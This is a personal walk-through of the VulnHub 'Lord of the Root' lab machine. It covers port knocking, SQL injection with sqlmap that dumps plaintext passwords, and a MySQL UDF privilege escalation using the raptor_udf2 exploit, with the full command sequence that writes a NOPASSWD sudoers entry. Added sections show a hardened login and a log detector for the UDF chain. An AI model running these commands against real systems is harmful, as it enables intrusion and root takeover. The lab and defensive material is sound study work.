The machine

This machine is one of the machines from the OSCP preparation guide I received from one of my teachers. It is the next one on the list and can be downloaded from VulnHub.

The challenge

The challenge or goal of the machine lists the following:

This is a boot-to-root machine and will not require any guest interaction.

https://www.vulnhub.com/entry/lord-of-the-root-101,129/

Walk-through

The walk-through is divided into a couple of sections following the standard penetration testing process: Information gathering –> Exploitation –> Post exploitation. It could be divided into more steps, but for simplicity we stick to these three.

Information gathering

To start off we find the IP address of the machine with nmap, since netdiscover takes a while on my VMware. We use the command sudo nmap -sn 192.168.0.0/24 for this. The vulnerable machine has the IP 192.168.0.136.

With the target known, we scan it for open ports with nmap. We do two scans: sudo nmap -sV -sC 192.168.0.136 -oA nmap and sudo nmap -sV -sC 192.168.0.136 -p- -oA fullnmap. The parameters mean:
-sV service and version enumeration,
-sC run the default script set,
-p- scan all 65535 ports,
-oA save the output in all three formats (normal, grepable and XML).

The nmap results are:

So only the SSH service is open. Once we SSH to the server (ssh 192.168.0.136) to grab the banner, it shows us: LOTR, knok friend to enter

I did this machine before and found it annoying; I could not finish it. But I remembered that we have to use a scanning tool that knocks on ports 1, 2 and 3 in that order. So I scanned the machine a couple of times with nmap -r -p 1,2,3 192.168.0.136. -r tells nmap not to randomise the port order and -p specifies ports 1, 2 and 3.

After that we did another full port scan and found the following results:

An Apache web server on port 1337. Let's start our vulnerability scanner nikto and our directory fuzzer dirb: nikto -host http://192.168.0.136:1337 -output=nikto.txt and dirb http://192.168.0.136:1337 -o dirb.txt.

Dirb only found a couple of directories:

The main web page shows us a meme:

Nothing interesting in the HTML source code:

The /images/ directory contains three memes: the one we saw earlier and two others, again nothing of interest. Requesting /server-stat gives a 403 Forbidden response.

Nikto shows us the web server is running an old Apache version on Ubuntu.

I went to the browser and manually checked the /robots.txt file. There is an image there, so I checked the source code and found the following:

An encoded string, which might be a hash. So I checked it with hash-identifier, which suggested it might be a Tiger-192 or HAVAL-192 hash.

I could not crack the hash value, so maybe it was just encoded. I ran it through a few things like ROT1-24 and Base64, and it turned out to be Base64-encoded. You can decode Base64 in the terminal with the base64 -d command.

It gave us a web page. If you browse to this page you get a login screen.

So I tried some basic SQL injections, like ' or 1=1# and ' or 1=1 --, but they didn't work. We don't have any other entry points in the vulnerable machine: no other ports, no other web pages. So I booted up sqlmap. To use it easily we started up Burp, filled in the form and saved the request to a file named request (right-click the request and choose Save item).

Exploitation

This file can then be passed to sqlmap instead of setting the parameters and the POST method by hand. So I ran sqlmap with the following command: sqlmap -r Request --dbs --level=4 --risk=2. It found a vulnerable parameter and gave us the following four databases.

Next we want to find out what is in the Webapp database. The following command selects the Webapp database and lists its tables: sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp --tables. It gave us one table, named Users.

Let's select this table and see what is in there.

We got three columns: id, password and username. The following command dumps both the username and the password columns: sqlmap -r Request --dbs --level=4 --risk=2 -D Webapp -T Users -C username,password --dump. It gave us the following accounts:

gimli:AndMyAxe
legolas:AndMyBow
aragorn:AndMySword
frodo:iwilltakethering
smeagol:MyPreciousR00t

So I tried SSHing into the server and could only log in with the smeagol account.
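The two findings sqlmap turned up (a login query that is injectable and a Users table holding passwords in clear text) come from the same kind of login code. As an added example, not the machine's login.php, here is the vulnerable pattern beside a hardened version, using an in-memory SQLite stand-in for the Webapp database with the Users schema dumped above and constructed sample rows; the table layout is the page's, the rest is assumed.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample accounts mirroring the dumped Users table (id, password, username).
# The machine stored passwords in clear text; here they only seed the table.
SAMPLE_USERS = [(1, "AndMyAxe", "gimli"), (2, "AndMyBow", "legolas"),
                (3, "MyPreciousR00t", "smeagol")]

def make_vulnerable_db():
    """In-memory SQLite stand-in for the Webapp database, plaintext passwords as dumped."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn

def login_vulnerable(conn, username, password):
    """Query built by string concatenation: the submitted text is parsed as SQL."""
    sql = ("SELECT username FROM Users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256; returns 'salt$hash' so the salt travels with the digest."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + digest.hex()

def make_hardened_db():
    """Same table, but the password column holds salted PBKDF2 hashes, not secrets."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, password TEXT, username TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                     [(i, hash_password(p), u) for i, p, u in SAMPLE_USERS])
    return conn

def login_hardened(conn, username, password):
    """Bound parameter for the lookup, constant-time compare of the recomputed hash."""
    row = conn.execute("SELECT password FROM Users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    salt_hex, _digest_hex = row[0].split("$")
    expected = hash_password(password, bytes.fromhex(salt_hex))
    return username if hmac.compare_digest(expected, row[0]) else None
```

With the parameterized lookup the ' or 1=1 -- input is only ever compared as a username string, and a dump of the hardened table yields salted hashes instead of the reusable passwords that gave SSH access here.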

Privilege escalation

While looking around for a privilege escalation technique I saw that multiple services (Apache, MySQL, etc.) are running as root.

In the web directory /var/www/978345210 we found the file login.php, which contains MySQL credentials.

I also checked whether we could write anything to these folders or files, but unfortunately we could not. That would have been an easy reverse shell ^^ With the command mysql -u root -p and the password darkshadow we could log in to the MySQL database. I could stop sqlmap, which I had left checking the other databases in the meantime. Since MySQL runs as root and we now have its root password, I found an exploit we can use to get root access.

So let's do this exploit. First we download it with wget https://www.exploit-db.com/raw/1518. Following the commented steps inside the exploit, it is easier to rename it to raptor_udf2.c. Compile it with gcc -g -c raptor_udf2.c and then gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc, log back in to the database with mysql -u root -p and the password darkshadow, and then issue the following MySQL commands:

mysql> use mysql;
mysql> create table foo(line blob);
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'; 
mysql> create function do_system returns integer soname 'raptor_udf2.so';
mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
mysql> \! sh
$ cat /tmp/out
uid=0(root) gid=0(root) groups=0(root)
mysql> select do_system('echo "smeagol ALL =(ALL) NOPASSWD: ALL" >> /etc/sudoers')
mysql> exit
Bye
smeagol@LordOfTheRoot:~$ sudo su
root@LordOfTheRoot:/home/smeagol# id && whoami
uid=0(root) gid=0(root) groups=0(root)
root
root@LordOfTheRoot:/home/smeagol# 

Damn, the MySQL privesc took me some time, way longer than expected. But I had to figure out how it worked to get it working, and I ran into some errors along the way when doing "create function do_system returns integer soname 'raptor_udf2.so';". It all worked when I did it from smeagol's home directory instead of /tmp. I even had to reset the machine twice to start over.
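A detection-side counterpart to the UDF session above, added here as an example and not part of the original write-up: it scans MySQL general-log lines for the load_file -> INTO DUMPFILE into the plugin directory -> CREATE FUNCTION ... SONAME chain, reports the connection that performed the whole chain, and checks mysql.func rows against an allowlist of expected shared objects. The log lines, their exact column spacing and the thread ids are constructed for the example.

```python
import re

# Constructed general-log lines in MySQL's format (timestamp, thread id, command, text).
# Thread 13 replays the UDF sequence from the walk-through beside ordinary traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:01.000000Z    12 Query    select id from Users where username='frodo'
2024-05-01T10:00:02.000000Z    13 Query    create table foo(line blob)
2024-05-01T10:00:03.000000Z    13 Query    insert into foo values(load_file('/home/smeagol/raptor_udf2.so'))
2024-05-01T10:00:04.000000Z    13 Query    select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so'
2024-05-01T10:00:05.000000Z    13 Query    create function do_system returns integer soname 'raptor_udf2.so'
2024-05-01T10:00:06.000000Z    13 Query    select do_system('id > /tmp/out')
2024-05-01T10:00:07.000000Z    14 Query    select count(*) from Users
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<tid>\d+)\s+(?P<cmd>\w+)\s+(?P<text>.*)$")

# Rules are matched against the lowercased statement; together they describe the
# load_file -> dumpfile into plugin dir -> CREATE FUNCTION ... SONAME chain.
RULES = [
    ("load_file", re.compile(r"\bload_file\s*\(")),
    ("dumpfile_to_plugin_dir", re.compile(r"into\s+(dumpfile|outfile)\s+'[^']*/plugin/")),
    ("create_function_soname", re.compile(r"create\s+function\b.*\bsoname\b")),
]

def scan_log(text):
    """Return (thread id, rule name, statement) for every Query line matching a rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["cmd"] != "Query":
            continue
        stmt = m["text"].lower()
        for name, rx in RULES:
            if rx.search(stmt):
                hits.append((int(m["tid"]), name, m["text"]))
    return hits

def udf_chains(hits):
    """Thread ids that both wrote a library into the plugin dir and registered a UDF."""
    by_tid = {}
    for tid, name, _ in hits:
        by_tid.setdefault(tid, set()).add(name)
    needed = {"dumpfile_to_plugin_dir", "create_function_soname"}
    return sorted(tid for tid, names in by_tid.items() if needed <= names)

def audit_func_table(rows, allowed_sonames=()):
    """Flag mysql.func rows (name, dl) whose shared object is not on the allowlist."""
    return [(name, dl) for name, dl in rows if dl not in allowed_sonames]
```

On a hardened server the dumpfile step fails before any of this fires: run mysqld as the unprivileged mysql user, keep the plugin directory unwritable to it, set secure_file_priv, and do not reuse the MySQL root password in a world-readable login.php.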

Flag
